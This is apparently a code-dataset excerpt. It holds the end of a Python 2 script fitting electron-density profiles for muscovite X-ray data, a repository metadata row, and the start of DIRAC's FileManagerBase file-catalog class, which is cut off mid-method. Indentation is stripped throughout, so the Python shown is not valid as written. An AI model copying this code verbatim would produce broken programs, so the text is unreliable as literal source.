def find_A_P_muscovite(q_list,ctrs,amps,wids,wt=0.25):
#ctrs:z list (in A with reference of surface having 0A)
#amps:oc list
#wids:u list(in A)
Q=q_list
A_container,P_container=[],[]
for q_index in range(len(Q)):
q=Q[q_index]
complex_sum=0.+1.0J*0.
for i in range(len(ctrs)):
complex_sum+=wt*amps[i]*np.exp(-q**2*wids[i]**2/2)*np.exp(1.0J*q*ctrs[i])#z should be plus 1 to account for the fact that surface slab sitting on top of bulk slab
A_container.append(abs(complex_sum))
img_complex_sum, real_complex_sum=np.imag(complex_sum),np.real(complex_sum)
if img_complex_sum==0.:
P_container.append(0)
elif real_complex_sum==0 and img_complex_sum==1:
P_container.append(0.25)#1/2pi/2pi
elif real_complex_sum==0 and img_complex_sum==-1:
P_container.append(0.75)#3/2pi/2pi
else:#adjustment is needed since the return of np.arctan is ranging from -1/2pi to 1/2pi
if real_complex_sum>0 and img_complex_sum>0:
P_container.append(np.arctan(img_complex_sum/real_complex_sum)/np.pi/2.)
elif real_complex_sum>0 and img_complex_sum<0:
P_container.append(np.arctan(img_complex_sum/real_complex_sum)/np.pi/2.+1.)
elif real_complex_sum<0 and img_complex_sum>0:
P_container.append(np.arctan(img_complex_sum/real_complex_sum)/np.pi/2.+0.5)
elif real_complex_sum<0 and img_complex_sum<0:
P_container.append(np.arctan(img_complex_sum/real_complex_sum)/np.pi/2.+0.5)
return np.array(A_container),np.array(P_container),Q
def fourier_synthesis(q_list,P,A,z,N=40,Auc=46.9275):
ZR=N
q_list.sort()
delta_q=np.average([q_list[i+1]-q_list[i] for i in range(len(q_list)-1)])
z_plot=z
eden_plot=[]
for i in range(len(z)):
z_each=z[i]
eden=0
eden=ZR/Auc/np.pi/2*np.sum(A*np.cos(2*np.pi*P-np.array(q_list)*z_each)*delta_q)
eden_plot.append(eden)
return eden_plot
def q_list_func(h, k, l,a=5.1988, b=9.0266, c=20.1058, alpha=90,beta=95.782,gamma=90):
'''Returns the absolute value of (h,k,l) vector in units of
AA.
This is equal to the inverse lattice spacing 1/d_hkl.
'''
h=np.array(h)
k=np.array(k)
l=np.array(l)
alpha,beta,gamma=np.deg2rad(alpha),np.deg2rad(beta),np.deg2rad(gamma)
dinv = np.sqrt(((h/a*np.sin(alpha))**2 +
(k/b*np.sin(beta))**2 +
(l/c*np.sin(gamma))**2 +
2*k*l/b/c*(np.cos(beta)*
np.cos(gamma) -
np.cos(alpha)) +
2*l*h/c/a*(np.cos(gamma)*
np.cos(alpha) -
np.cos(beta)) +
2*h*k/a/b*(np.cos(alpha)*
np.cos(beta) -
np.cos(gamma)))
/(1 - np.cos(alpha)**2 - np.cos(beta)**2
- np.cos(gamma)**2 + 2*np.cos(alpha)
*np.cos(beta)*np.cos(gamma)))
return dinv*np.pi*2
def fit_e_density(path=module_path_locator(),fit_range=[1,40],zs=None,N=8):
PATH=path
##extract hkl values##
full_dataset=np.loadtxt(os.path.join(PATH,"temp_full_dataset.dat"))
h,k,l=[],[],[]
for i in range(len(full_dataset)):
if full_dataset[i,3]!=0:
if full_dataset[i,3] not in l:
h.append(full_dataset[i,1])
k.append(full_dataset[i,2])
l.append(full_dataset[i,3])
##extract e density data##
data_file=os.path.join(PATH,"temp_plot_eden_fourier_synthesis")
data=np.append([pickle.load(open(data_file,"rb"))[0]],[pickle.load(open(data_file,"rb"))[1]],axis=0).transpose()
##extract water scaling value##
water_scaling_file=os.path.join(PATH,"water_scaling")
water_scaling=pickle.load(open(water_scaling_file,"rb"))[-1]
x,y=[],[]
for i in range(len(data)):
if data[i,0]>fit_range[0] and data[i,0]<fit_range[1]:
x.append(data[i,0]),y.append(data[i,1])
x,y=np.array(x),np.array(y)*water_scaling
plt.plot(x,y)
plt.show()
#cal q list
q_list=q_list_func(h,k,l)
def func(x_ctrs_qs,*params):
x=x_ctrs_qs[0]
ctrs=x_ctrs_qs[1]
q_list=x_ctrs_qs[2]
amps=[]
wids=[]
for i in range(0, len(params), 2):
amps.append(abs(params[i]))
wids.append(abs(params[i+1]))
#cal A and P list
A,P,Q=find_A_P_muscovite(q_list,ctrs,amps,wids)
#Fourier thynthesis
y=fourier_synthesis(q_list,P,A,z=x,N=40)
return y
guess = []
ctrs=[]
if zs==None:
for i in range(1,len(x)-1):
if y[i-1]<y[i] and y[i+1]<y[i]:
ctrs.append(x[i])
elif type(zs)==int:
ctrs=[fit_range[0]+(fit_range[1]-fit_range[0])/zs*i for i in range(zs)]+[fit_range[1]]
else:
ctrs=np.array(zs)
for i in range(len(ctrs)):
guess += [0.5, 1]
#print x,ctrs
popt, pcov = curve_fit(func, [x,ctrs,q_list], y, p0=guess)
combinded_set=[]
#print 'z occupancy*4 U(sigma**2)'
for i in range(0,len(popt),2):
combinded_set=combinded_set+[ctrs[i/2],abs(popt[i])*4,abs(popt[i+1])**2]
#print '%3.3f\t%3.3f\t%3.3f'%(ctrs[i/2],abs(popt[i])/N*(abs(popt[i+1])*np.sqrt(np.pi*2)*5.199*9.027)*4,abs(popt[i+1])**2)
combinded_set=np.reshape(np.array(combinded_set),(len(combinded_set)/3,3)).transpose()
#combinded_set=combinded_set.transpose()
print 'total_occupancy=',np.sum(combinded_set[1,:]/4)
print 'OC_RAXS_LIST=np.array([',','.join([str(each) for each in combinded_set[1,:]]),'])'
print 'U_RAXS_LIST=np.array([',','.join([str(each) for each in combinded_set[2,:]]),'])'
print 'X_RAXS_LIST=[0.5]*',len(combinded_set[1,:])
print 'Y_RAXS_LIST=[0.5]*',len(combinded_set[1,:])
print 'Z_RAXS_LIST=np.array([',','.join([str(each) for each in combinded_set[0,:]]),'])'
fit = func([x,ctrs], *popt)
plt.plot(x, y)
plt.plot(x, fit , 'r-')
plt.show()
if __name__=="__main__":
plot_all(make_offset_of_total_e=False)
|
jackey-qiu/genx_pc_qiu
|
supportive_functions/create_plots.py
|
Python
|
gpl-3.0
| 99,040
|
[
"Gaussian",
"VTK"
] |
49999d1b0bdff355d1991dddd25b058c8fc813bb39c6ef193548e852e855fe0f
|
""" FileManagerBase is a base class for all the specific File Managers
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
# pylint: disable=protected-access
import six
import os
import stat
from DIRAC import S_OK, S_ERROR, gLogger
from DIRAC.Core.Utilities.List import intListToString
from DIRAC.Core.Utilities.Pfn import pfnunparse
class FileManagerBase(object):
""" Base class for all the specific File Managers
"""
def __init__(self, database=None):
self.db = database
self.statusDict = {}
def _getConnection(self, connection):
if connection:
return connection
res = self.db._getConnection()
if res['OK']:
return res['Value']
gLogger.warn("Failed to get MySQL connection", res['Message'])
return connection
def setDatabase(self, database):
self.db = database
def getFileCounters(self, connection=False):
""" Get a number of counters to verify the sanity of the Files in the catalog
"""
connection = self._getConnection(connection)
resultDict = {}
req = "SELECT COUNT(*) FROM FC_Files;"
res = self.db._query(req, connection)
if not res['OK']:
return res
resultDict['Files'] = res['Value'][0][0]
req = "SELECT COUNT(FileID) FROM FC_Files WHERE FileID NOT IN ( SELECT FileID FROM FC_Replicas )"
res = self.db._query(req, connection)
if not res['OK']:
return res
resultDict['Files w/o Replicas'] = res['Value'][0][0]
req = "SELECT COUNT(RepID) FROM FC_Replicas WHERE FileID NOT IN ( SELECT FileID FROM FC_Files )"
res = self.db._query(req, connection)
if not res['OK']:
return res
resultDict['Replicas w/o Files'] = res['Value'][0][0]
treeTable = self.db.dtree.getTreeTable()
req = "SELECT COUNT(FileID) FROM FC_Files WHERE DirID NOT IN ( SELECT DirID FROM %s)" % treeTable
res = self.db._query(req, connection)
if not res['OK']:
return res
resultDict['Orphan Files'] = res['Value'][0][0]
req = "SELECT COUNT(FileID) FROM FC_Files WHERE FileID NOT IN ( SELECT FileID FROM FC_FileInfo)"
res = self.db._query(req, connection)
if not res['OK']:
resultDict['Files w/o FileInfo'] = 0
else:
resultDict['Files w/o FileInfo'] = res['Value'][0][0]
req = "SELECT COUNT(FileID) FROM FC_FileInfo WHERE FileID NOT IN ( SELECT FileID FROM FC_Files)"
res = self.db._query(req, connection)
if not res['OK']:
resultDict['FileInfo w/o Files'] = 0
else:
resultDict['FileInfo w/o Files'] = res['Value'][0][0]
return S_OK(resultDict)
def getReplicaCounters(self, connection=False):
""" Get a number of counters to verify the sanity of the Replicas in the catalog
"""
connection = self._getConnection(connection)
req = "SELECT COUNT(*) FROM FC_Replicas;"
res = self.db._query(req, connection)
if not res['OK']:
return res
return S_OK({'Replicas': res['Value'][0][0]})
######################################################
#
# File write methods
#
def _insertFiles(self, lfns, uid, gid, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _deleteFiles(self, toPurge, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _insertReplicas(self, lfns, master=False, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _findFiles(self, lfns, metadata=["FileID"], allStatus=False, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _getFileReplicas(self, fileIDs, fields_input=['PFN'], allStatus=False, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _getFileIDFromGUID(self, guid, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def getLFNForGUID(self, guids, connection=False):
"""Returns the LFN matching a given GUID
"""
return S_ERROR("To be implemented on derived class")
def _setFileParameter(self, fileID, paramName, paramValue, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _deleteReplicas(self, lfns, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _setReplicaStatus(self, fileID, se, status, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _setReplicaHost(self, fileID, se, newSE, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _getDirectoryFiles(self, dirID, fileNames, metadata, allStatus=False, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _getDirectoryFileIDs(self, dirID, requestString=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _findFileIDs(self, lfns, connection=False):
""" To be implemented on derived class
Should return following the successful/failed convention
Successful is a dictionary with keys the lfn, and values the FileID"""
return S_ERROR("To be implemented on derived class")
def _getDirectoryReplicas(self, dirID, allStatus=False, connection=False):
""" To be implemented on derived class
Should return with only one value, being a list of all the replicas (FileName,FileID,SEID,PFN)
"""
return S_ERROR("To be implemented on derived class")
def countFilesInDir(self, dirId):
""" Count how many files there is in a given Directory
:param int dirID: directory id
:returns: S_OK(value) or S_ERROR
"""
return S_ERROR("To be implemented on derived class")
def _getFileLFNs(self, fileIDs):
""" Get the file LFNs for a given list of file IDs
"""
stringIDs = intListToString(fileIDs)
treeTable = self.db.dtree.getTreeTable()
req = "SELECT F.FileID, CONCAT(D.DirName,'/',F.FileName) from FC_Files as F,\
%s as D WHERE F.FileID IN ( %s ) AND F.DirID=D.DirID" % (
treeTable, stringIDs)
result = self.db._query(req)
if not result['OK']:
return result
fileNameDict = {}
for row in result['Value']:
fileNameDict[row[0]] = row[1]
failed = {}
successful = fileNameDict
if len(fileNameDict) != len(fileIDs):
for id_ in fileIDs:
if id_ not in fileNameDict:
failed[id_] = "File ID not found"
return S_OK({'Successful': successful, 'Failed': failed})
def addFile(self, lfns, credDict, connection=False):
""" Add files to the catalog
:param dict lfns: dict{ lfn : info}. 'info' is a dict containing PFN, SE, Size and Checksum
the SE parameter can be a list if we have several replicas to register
"""
connection = self._getConnection(connection)
successful = {}
failed = {}
for lfn, info in list(lfns.items()):
res = self._checkInfo(info, ['PFN', 'SE', 'Size', 'Checksum'])
if not res['OK']:
failed[lfn] = res['Message']
lfns.pop(lfn)
res = self._addFiles(lfns, credDict, connection=connection)
if not res['OK']:
for lfn in lfns.keys():
failed[lfn] = res['Message']
else:
failed.update(res['Value']['Failed'])
successful.update(res['Value']['Successful'])
return S_OK({'Successful': successful, 'Failed': failed})
def _addFiles(self, lfns, credDict, connection=False):
""" Main file adding method
"""
connection = self._getConnection(connection)
successful = {}
result = self.db.ugManager.getUserAndGroupID(credDict)
if not result['OK']:
return result
uid, gid = result['Value']
# prepare lfns with master replicas - the first in the list or a unique replica
masterLfns = {}
extraLfns = {}
for lfn in lfns:
masterLfns[lfn] = dict(lfns[lfn])
if isinstance(lfns[lfn].get('SE'), list):
masterLfns[lfn]['SE'] = lfns[lfn]['SE'][0]
if len(lfns[lfn]['SE']) > 1:
extraLfns[lfn] = dict(lfns[lfn])
extraLfns[lfn]['SE'] = lfns[lfn]['SE'][1:]
# Check whether the supplied files have been registered already
res = self._getExistingMetadata(list(masterLfns), connection=connection)
if not res['OK']:
return res
existingMetadata, failed = res['Value']
if existingMetadata:
success, fail = self._checkExistingMetadata(existingMetadata, masterLfns)
successful.update(success)
failed.update(fail)
for lfn in list(success) + list(fail):
masterLfns.pop(lfn)
# If GUIDs are supposed to be unique check their pre-existance
if self.db.uniqueGUID:
fail = self._checkUniqueGUID(masterLfns, connection=connection)
failed.update(fail)
for lfn in fail:
masterLfns.pop(lfn)
# If we have files left to register
if masterLfns:
# Create the directories for the supplied files and store their IDs
directories = self._getFileDirectories(list(masterLfns))
for directory, fileNames in directories.items():
res = self.db.dtree.makeDirectories(directory, credDict)
if not res['OK']:
for fileName in fileNames:
lfn = os.path.join(directory, fileName)
failed[lfn] = res['Message']
masterLfns.pop(lfn)
continue
for fileName in fileNames:
if not fileName:
failed[directory] = "Is no a valid file"
masterLfns.pop(directory)
continue
lfn = "%s/%s" % (directory, fileName)
lfn = lfn.replace('//', '/')
# This condition should never be true, we would not be here otherwise...
if not res['OK']:
failed[lfn] = "Failed to create directory for file"
masterLfns.pop(lfn)
else:
masterLfns[lfn]['DirID'] = res['Value']
# If we still have files left to register
if masterLfns:
res = self._insertFiles(masterLfns, uid, gid, connection=connection)
if not res['OK']:
for lfn in list(masterLfns): # pylint: disable=consider-iterating-dictionary
failed[lfn] = res['Message']
masterLfns.pop(lfn)
else:
for lfn, error in res['Value']['Failed'].items():
failed[lfn] = error
masterLfns.pop(lfn)
masterLfns = res['Value']['Successful']
# Add the ancestors
if masterLfns:
res = self._populateFileAncestors(masterLfns, connection=connection)
toPurge = []
if not res['OK']:
for lfn in masterLfns.keys():
failed[lfn] = "Failed while registering ancestors"
toPurge.append(masterLfns[lfn]['FileID'])
else:
failed.update(res['Value']['Failed'])
for lfn, error in res['Value']['Failed'].items():
toPurge.append(masterLfns[lfn]['FileID'])
if toPurge:
self._deleteFiles(toPurge, connection=connection)
# Register the replicas
newlyRegistered = {}
if masterLfns:
res = self._insertReplicas(masterLfns, master=True, connection=connection)
toPurge = []
if not res['OK']:
for lfn in masterLfns.keys():
failed[lfn] = "Failed while registering replica"
toPurge.append(masterLfns[lfn]['FileID'])
else:
newlyRegistered = res['Value']['Successful']
successful.update(newlyRegistered)
failed.update(res['Value']['Failed'])
for lfn, error in res['Value']['Failed'].items():
toPurge.append(masterLfns[lfn]['FileID'])
if toPurge:
self._deleteFiles(toPurge, connection=connection)
# Add extra replicas for successfully registered LFNs
for lfn in list(extraLfns):
if lfn not in successful:
extraLfns.pop(lfn)
if extraLfns:
res = self._findFiles(list(extraLfns), ['FileID', 'DirID'], connection=connection)
if not res['OK']:
for lfn in list(lfns):
failed[lfn] = 'Failed while registering extra replicas'
successful.pop(lfn)
extraLfns.pop(lfn)
else:
failed.update(res['Value']['Failed'])
for lfn in res['Value']['Failed']:
successful.pop(lfn)
extraLfns.pop(lfn)
for lfn, fileDict in res['Value']['Successful'].items():
extraLfns[lfn]['FileID'] = fileDict['FileID']
extraLfns[lfn]['DirID'] = fileDict['DirID']
if extraLfns:
res = self._insertReplicas(extraLfns, master=False, connection=connection)
if not res['OK']:
for lfn in extraLfns: # pylint: disable=consider-iterating-dictionary
failed[lfn] = "Failed while registering extra replicas"
successful.pop(lfn)
else:
newlyRegistered = res['Value']['Successful']
successful.update(newlyRegistered)
failed.update(res['Value']['Failed'])
return S_OK({'Successful': successful, 'Failed': failed})
def _updateDirectoryUsage(self, directorySEDict, change, connection=False):
connection = self._getConnection(connection)
for directoryID in directorySEDict.keys():
result = self.db.dtree.getPathIDsByID(directoryID)
if not result['OK']:
return result
parentIDs = result['Value']
dirDict = directorySEDict[directoryID]
for seID in dirDict.keys():
seDict = dirDict[seID]
files = seDict['Files']
size = seDict['Size']
insertTuples = []
for dirID in parentIDs:
insertTuples.append('(%d,%d,%d,%d,UTC_TIMESTAMP())' % (dirID, seID, size, files))
req = "INSERT INTO FC_DirectoryUsage (DirID,SEID,SESize,SEFiles,LastUpdate) "
req += "VALUES %s" % ','.join(insertTuples)
req += " ON DUPLICATE KEY UPDATE SESize=SESize%s%d, SEFiles=SEFiles%s%d, LastUpdate=UTC_TIMESTAMP() " \
% (change, size, change, files)
res = self.db._update(req)
if not res['OK']:
gLogger.warn("Failed to update FC_DirectoryUsage", res['Message'])
return S_OK()
def _populateFileAncestors(self, lfns, connection=False):
connection = self._getConnection(connection)
successful = {}
failed = {}
for lfn, lfnDict in lfns.items():
originalFileID = lfnDict['FileID']
originalDepth = lfnDict.get('AncestorDepth', 1)
ancestors = lfnDict.get('Ancestors', [])
if isinstance(ancestors, six.string_types):
ancestors = [ancestors]
if lfn in ancestors:
ancestors.remove(lfn)
if not ancestors:
successful[lfn] = True
continue
res = self._findFiles(ancestors, connection=connection)
if res['Value']['Failed']:
failed[lfn] = "Failed to resolve ancestor files"
continue
ancestorIDs = res['Value']['Successful']
fileIDLFNs = {}
toInsert = {}
for ancestor in ancestorIDs.keys():
fileIDLFNs[ancestorIDs[ancestor]['FileID']] = ancestor
toInsert[ancestorIDs[ancestor]['FileID']] = originalDepth
res = self._getFileAncestors(list(fileIDLFNs))
if not res['OK']:
failed[lfn] = "Failed to obtain all ancestors"
continue
fileIDAncestorDict = res['Value']
for fileIDDict in fileIDAncestorDict.values():
for ancestorID, relativeDepth in fileIDDict.items():
toInsert[ancestorID] = relativeDepth + originalDepth
res = self._insertFileAncestors(originalFileID, toInsert, connection=connection)
if not res['OK']:
if "Duplicate" in res['Message']:
failed[lfn] = "Failed to insert ancestor files: duplicate entry"
else:
failed[lfn] = "Failed to insert ancestor files"
else:
successful[lfn] = True
return S_OK({'Successful': successful, 'Failed': failed})
def _insertFileAncestors(self, fileID, ancestorDict, connection=False):
connection = self._getConnection(connection)
ancestorTuples = []
for ancestorID, depth in ancestorDict.items():
ancestorTuples.append("(%d,%d,%d)" % (fileID, ancestorID, depth))
if not ancestorTuples:
return S_OK()
req = "INSERT INTO FC_FileAncestors (FileID, AncestorID, AncestorDepth) VALUES %s" \
% intListToString(ancestorTuples)
return self.db._update(req, connection)
def _getFileAncestors(self, fileIDs, depths=[], connection=False):
connection = self._getConnection(connection)
req = "SELECT FileID, AncestorID, AncestorDepth FROM FC_FileAncestors WHERE FileID IN (%s)" \
% intListToString(fileIDs)
if depths:
req = "%s AND AncestorDepth IN (%s);" % (req, intListToString(depths))
res = self.db._query(req, connection)
if not res['OK']:
return res
fileIDAncestors = {}
for fileID, ancestorID, depth in res['Value']:
if fileID not in fileIDAncestors:
fileIDAncestors[fileID] = {}
fileIDAncestors[fileID][ancestorID] = depth
return S_OK(fileIDAncestors)
def _getFileDescendents(self, fileIDs, depths, connection=False):
connection = self._getConnection(connection)
req = "SELECT AncestorID, FileID, AncestorDepth FROM FC_FileAncestors WHERE AncestorID IN (%s)" \
% intListToString(fileIDs)
if depths:
req = "%s AND AncestorDepth IN (%s);" % (req, intListToString(depths))
res = self.db._query(req, connection)
if not res['OK']:
return res
fileIDAncestors = {}
for ancestorID, fileID, depth in res['Value']:
if ancestorID not in fileIDAncestors:
fileIDAncestors[ancestorID] = {}
fileIDAncestors[ancestorID][fileID] = depth
return S_OK(fileIDAncestors)
def addFileAncestors(self, lfns, connection=False):
""" Add file ancestors to the catalog """
connection = self._getConnection(connection)
failed = {}
successful = {}
result = self._findFiles(list(lfns), connection=connection)
if not result['OK']:
return result
if result['Value']['Failed']:
failed.update(result['Value']['Failed'])
for lfn in result['Value']['Failed']:
lfns.pop(lfn)
if not lfns:
return S_OK({'Successful': successful, 'Failed': failed})
for lfn in result['Value']['Successful']:
lfns[lfn]['FileID'] = result['Value']['Successful'][lfn]['FileID']
result = self._populateFileAncestors(lfns, connection)
if not result['OK']:
return result
failed.update(result['Value']['Failed'])
successful = result['Value']['Successful']
return S_OK({'Successful': successful, 'Failed': failed})
def _getFileRelatives(self, lfns, depths, relation, connection=False):
connection = self._getConnection(connection)
failed = {}
successful = {}
result = self._findFiles(list(lfns), connection=connection)
if not result['OK']:
return result
if result['Value']['Failed']:
failed.update(result['Value']['Failed'])
for lfn in result['Value']['Failed']:
lfns.pop(lfn)
if not lfns:
return S_OK({'Successful': successful, 'Failed': failed})
inputIDDict = {}
for lfn in result['Value']['Successful']:
inputIDDict[result['Value']['Successful'][lfn]['FileID']] = lfn
inputIDs = list(inputIDDict)
if relation == 'ancestor':
result = self._getFileAncestors(inputIDs, depths, connection)
else:
result = self._getFileDescendents(inputIDs, depths, connection)
if not result['OK']:
return result
failed = {}
successful = {}
relDict = result['Value']
for id_ in inputIDs:
if id_ in relDict:
result = self._getFileLFNs(list(relDict[id_]))
if not result['OK']:
failed[inputIDDict[id]] = "Failed to find %s" % relation
else:
if result['Value']['Successful']:
resDict = {}
for aID in result['Value']['Successful']:
resDict[result['Value']['Successful'][aID]] = relDict[id_][aID]
successful[inputIDDict[id_]] = resDict
for aID in result['Value']['Failed']:
failed[inputIDDict[id_]] = "Failed to get the ancestor LFN"
else:
successful[inputIDDict[id_]] = {}
return S_OK({'Successful': successful, 'Failed': failed})
def getFileAncestors(self, lfns, depths, connection=False):
return self._getFileRelatives(lfns, depths, 'ancestor', connection)
def getFileDescendents(self, lfns, depths, connection=False):
return self._getFileRelatives(lfns, depths, 'descendent', connection)
def _getExistingMetadata(self, lfns, connection=False):
connection = self._getConnection(connection)
# Check whether the files already exist before adding
res = self._findFiles(lfns, ['FileID', 'Size', 'Checksum', 'GUID'], connection=connection)
if not res['OK']:
return res
successful = res['Value']['Successful']
failed = res['Value']['Failed']
for lfn, error in list(failed.items()):
if error == 'No such file or directory':
failed.pop(lfn)
return S_OK((successful, failed))
def _checkExistingMetadata(self, existingLfns, lfns):
failed = {}
successful = {}
fileIDLFNs = {}
for lfn, fileDict in existingLfns.items():
fileIDLFNs[fileDict['FileID']] = lfn
# For those that exist get the replicas to determine whether they are already registered
res = self._getFileReplicas(list(fileIDLFNs))
if not res['OK']:
for lfn in fileIDLFNs.values():
failed[lfn] = 'Failed checking pre-existing replicas'
else:
replicaDict = res['Value']
for fileID, lfn in fileIDLFNs.items():
fileMetadata = existingLfns[lfn]
existingGuid = fileMetadata['GUID']
existingSize = fileMetadata['Size']
existingChecksum = fileMetadata['Checksum']
newGuid = lfns[lfn]['GUID']
newSize = lfns[lfn]['Size']
newChecksum = lfns[lfn]['Checksum']
# Ensure that the key file metadata is the same
if (existingGuid != newGuid) or \
(existingSize != newSize) or \
(existingChecksum != newChecksum):
failed[lfn] = "File already registered with alternative metadata"
# If the DB does not have replicas for this file return an error
elif fileID not in replicaDict or not replicaDict[fileID]:
failed[lfn] = "File already registered with no replicas"
# If the supplied SE is not in the existing replicas return an error
elif not lfns[lfn]['SE'] in replicaDict[fileID].keys():
failed[lfn] = "File already registered with alternative replicas"
# If we get here the file being registered already exists exactly in the DB
else:
successful[lfn] = True
return successful, failed
def _checkUniqueGUID(self, lfns, connection=False):
connection = self._getConnection(connection)
guidLFNs = {}
failed = {}
for lfn, fileDict in lfns.items():
guidLFNs[fileDict['GUID']] = lfn
res = self._getFileIDFromGUID(list(guidLFNs), connection=connection)
if not res['OK']:
return dict.fromkeys(lfns, res['Message'])
for guid, fileID in res['Value'].items():
# resolve this to LFN
failed[guidLFNs[guid]] = "GUID already registered for another file %s" % fileID
return failed
def removeFile(self, lfns, connection=False):
connection = self._getConnection(connection)
""" Remove file from the catalog """
successful = {}
failed = {}
res = self._findFiles(lfns, ['DirID', 'FileID', 'Size'], connection=connection)
if not res['OK']:
return res
for lfn, error in res['Value']['Failed'].items():
if error == 'No such file or directory':
successful[lfn] = True
else:
failed[lfn] = error
fileIDLfns = {}
lfns = res['Value']['Successful']
for lfn, lfnDict in lfns.items():
fileIDLfns[lfnDict['FileID']] = lfn
res = self._computeStorageUsageOnRemoveFile(lfns, connection=connection)
if not res['OK']:
return res
directorySESizeDict = res['Value']
# Now do removal
res = self._deleteFiles(list(fileIDLfns), connection=connection)
if not res['OK']:
for lfn in fileIDLfns.values():
failed[lfn] = res['Message']
else:
# Update the directory usage
self._updateDirectoryUsage(directorySESizeDict, '-', connection=connection)
for lfn in fileIDLfns.values():
successful[lfn] = True
return S_OK({"Successful": successful, "Failed": failed})
def _computeStorageUsageOnRemoveFile(self, lfns, connection=False):
# Resolve the replicas to calculate reduction in storage usage
fileIDLfns = {}
for lfn, lfnDict in lfns.items():
fileIDLfns[lfnDict['FileID']] = lfn
res = self._getFileReplicas(list(fileIDLfns), connection=connection)
if not res['OK']:
return res
directorySESizeDict = {}
for fileID, seDict in res['Value'].items():
dirID = lfns[fileIDLfns[fileID]]['DirID']
size = lfns[fileIDLfns[fileID]]['Size']
directorySESizeDict.setdefault(dirID, {})
directorySESizeDict[dirID].setdefault(0, {'Files': 0, 'Size': 0})
directorySESizeDict[dirID][0]['Size'] += size
directorySESizeDict[dirID][0]['Files'] += 1
for seName in seDict.keys():
res = self.db.seManager.findSE(seName)
if not res['OK']:
return res
seID = res['Value']
size = lfns[fileIDLfns[fileID]]['Size']
directorySESizeDict[dirID].setdefault(seID, {'Files': 0, 'Size': 0})
directorySESizeDict[dirID][seID]['Size'] += size
directorySESizeDict[dirID][seID]['Files'] += 1
return S_OK(directorySESizeDict)
def setFileStatus(self, lfns, connection=False):
""" Get set the group for the supplied files """
connection = self._getConnection(connection)
res = self._findFiles(lfns, ['FileID', 'UID'], connection=connection)
if not res['OK']:
return res
failed = res['Value']['Failed']
successful = {}
for lfn in res['Value']['Successful']:
status = lfns[lfn]
if isinstance(status, six.string_types):
if status not in self.db.validFileStatus:
failed[lfn] = 'Invalid file status %s' % status
continue
result = self._getStatusInt(status, connection=connection)
if not result['OK']:
failed[lfn] = res['Message']
continue
status = result['Value']
fileID = res['Value']['Successful'][lfn]['FileID']
res = self._setFileParameter(fileID, "Status", status, connection=connection)
if not res['OK']:
failed[lfn] = res['Message']
else:
successful[lfn] = True
return S_OK({'Successful': successful, 'Failed': failed})
######################################################
#
# Replica write methods
#
def addReplica(self, lfns, connection=False):
""" Add replica to the catalog """
connection = self._getConnection(connection)
successful = {}
failed = {}
for lfn, info in list(lfns.items()):
res = self._checkInfo(info, ['PFN', 'SE'])
if not res['OK']:
failed[lfn] = res['Message']
lfns.pop(lfn)
res = self._addReplicas(lfns, connection=connection)
if not res['OK']:
for lfn in lfns:
failed[lfn] = res['Message']
else:
failed.update(res['Value']['Failed'])
successful.update(res['Value']['Successful'])
return S_OK({'Successful': successful, 'Failed': failed})
def _addReplicas(self, lfns, connection=False):
connection = self._getConnection(connection)
successful = {}
res = self._findFiles(list(lfns), ['DirID', 'FileID', 'Size'], connection=connection)
if not res['OK']:
return res
failed = res['Value']['Failed']
for lfn in failed:
lfns.pop(lfn)
lfnFileIDDict = res['Value']['Successful']
for lfn, fileDict in lfnFileIDDict.items():
lfns[lfn].update(fileDict)
res = self._insertReplicas(lfns, connection=connection)
if not res['OK']:
for lfn in lfns:
failed[lfn] = res['Message']
else:
successful = res['Value']['Successful']
failed.update(res['Value']['Failed'])
return S_OK({'Successful': successful, 'Failed': failed})
def removeReplica(self, lfns, connection=False):
""" Remove replica from catalog """
connection = self._getConnection(connection)
successful = {}
failed = {}
for lfn, info in list(lfns.items()):
res = self._checkInfo(info, ['SE'])
if not res['OK']:
failed[lfn] = res['Message']
lfns.pop(lfn)
res = self._deleteReplicas(lfns, connection=connection)
if not res['OK']:
for lfn in lfns.keys():
failed[lfn] = res['Message']
else:
failed.update(res['Value']['Failed'])
successful.update(res['Value']['Successful'])
return S_OK({'Successful': successful, 'Failed': failed})
def setReplicaStatus(self, lfns, connection=False):
""" Set replica status in the catalog """
connection = self._getConnection(connection)
successful = {}
failed = {}
for lfn, info in lfns.items():
res = self._checkInfo(info, ['SE', 'Status'])
if not res['OK']:
failed[lfn] = res['Message']
continue
status = info['Status']
se = info['SE']
res = self._findFiles([lfn], ['FileID'], connection=connection)
if lfn not in res['Value']['Successful']:
failed[lfn] = res['Value']['Failed'][lfn]
continue
fileID = res['Value']['Successful'][lfn]['FileID']
res = self._setReplicaStatus(fileID, se, status, connection=connection)
if res['OK']:
successful[lfn] = res['Value']
else:
failed[lfn] = res['Message']
return S_OK({'Successful': successful, 'Failed': failed})
def setReplicaHost(self, lfns, connection=False):
""" Set replica host in the catalog """
connection = self._getConnection(connection)
successful = {}
failed = {}
for lfn, info in lfns.items():
res = self._checkInfo(info, ['SE', 'NewSE'])
if not res['OK']:
failed[lfn] = res['Message']
continue
newSE = info['NewSE']
se = info['SE']
res = self._findFiles([lfn], ['FileID'], connection=connection)
if lfn not in res['Value']['Successful']:
failed[lfn] = res['Value']['Failed'][lfn]
continue
fileID = res['Value']['Successful'][lfn]['FileID']
res = self._setReplicaHost(fileID, se, newSE, connection=connection)
if res['OK']:
successful[lfn] = res['Value']
else:
failed[lfn] = res['Message']
return S_OK({'Successful': successful, 'Failed': failed})
######################################################
#
# File read methods
#
def exists(self, lfns, connection=False):
""" Determine whether a file exists in the catalog """
connection = self._getConnection(connection)
res = self._findFiles(lfns, allStatus=True, connection=connection)
if not res['OK']:
return res
